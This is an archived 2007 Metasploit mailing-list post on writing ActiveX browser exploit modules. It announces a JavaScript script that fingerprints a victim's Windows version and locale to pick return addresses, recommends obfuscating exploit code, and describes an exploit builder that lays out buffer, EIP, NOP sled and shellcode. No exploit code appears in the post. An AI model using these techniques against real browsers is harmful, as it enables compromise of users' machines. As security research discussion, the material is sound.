Metasploit mailing list archives
MoAxB in the MSF world: target OS detection with JavaScript
From: jerome.athias at free.fr (Jerome Athias)
Date: Fri, 18 May 2007 14:11:33 +0200
Hi there, since multiple vulnerabilities are released during the MoAxB - Month of ActiveX Bug [Ref1] some guys started to release exploit modules for the Metasploit Framework. For example: NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/bearshare_setformatlikesample.rb This one is interesting due to the numbers of softwares using it, ref: http://www.milw0rm.com/exploits/3728 (and http://www.milw0rm.com/exploits/3808 ) When using a Windows' DLL-based return address, OS fingerprinting introduces itself as a key point. Fortunately, when targeting a browser, JavaScript can help to drastically increase the chance of a successful exploitation. [Ref2] [Ref3] For this, i released the os_detect JavaScript script: https://www.securinfos.info/jerome/os_detect.js By using the included giveMeRET() function in an exploit, it will retrieve the Windows version and locale of the target and return a good ret address. To obfuscate the exploit code, people should use both the rand_text_alpha() and obfuscate_js() functions. [Ref4] os_detect.js will be enhanced soon (using arrays, adding support for more opcodes support, adding support for more locales, etc). People can help me to improve the return addresses database by following these steps: 1) Download this package: https://www.securinfos.info/OPCODES_LIST.zip on one Windows box 2) Extract it and run the OPCODES_LIST.bat script 3) Send the results file OPCODES_LIST.txt to me To help people to write reliable ActiveX exploit modules for the Metasploit Framework, i have also coded some useful functionnalities in the MSF eXploit Builder tool. https://www.securinfos.info/metasploit/MSF_XB.php ie: * it now retrieves automatically the CLSID of a given .OCX/.DLL file from the registry * it is now possible to enter the design of the exploit (ie: buff + EIP + nop + shellcode + nop) and it will automatically generate the matching code * and others ;-) -- available soon References: [Ref1] MoAxB: http://moaxb.blogspot.com/ [Ref2] Metasploit Browser Assessment: http://www.metasploit.com/research/misc/browserscan/ [Ref3] http://kartoush.ibelgique.com/pdf/SSTIC06-article-Delalleau_Feil-Vulnerabilite_des_postes_clients.pdf (French) [Ref4] http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html Again, you can find copies of vulnerable softwares versions on: https://www.securinfos.info/old-softwares-vulnerable.php Enjoy! I hope it will help before an AJAX request to the msfopcodes database is released :p /JA Note: i'll appreciate a little credit if you use some return addresses from os_detect.js ;-) thanks Regards to my friends, you know who you are ;-)
Current thread:
- MoAxB in the MSF world: target OS detection with JavaScript Jerome Athias (May 18)
- MoAxB in the MSF world: target OS detection with JavaScript Kurt Grutzmacher (May 18)
- MoAxB in the MSF world: target OS detection with JavaScript Jerome Athias (May 21)
- MoAxB in the MSF world: target OS detection with JavaScript Nicob (May 21)
- MoAxB in the MSF world: target OS detection with JavaScript Jerome Athias (May 21)
- MoAxB in the MSF world: target OS detection with JavaScript Jerome Athias (May 21)
- MoAxB in the MSF world: target OS detection with JavaScript Kurt Grutzmacher (May 18)
- <Possible follow-ups>
- MoAxB in the MSF world: target OS detection with JavaScript Mike Whitehead (May 18)
- MoAxB in the MSF world: target OS detection with JavaScript Jerome Athias (May 18)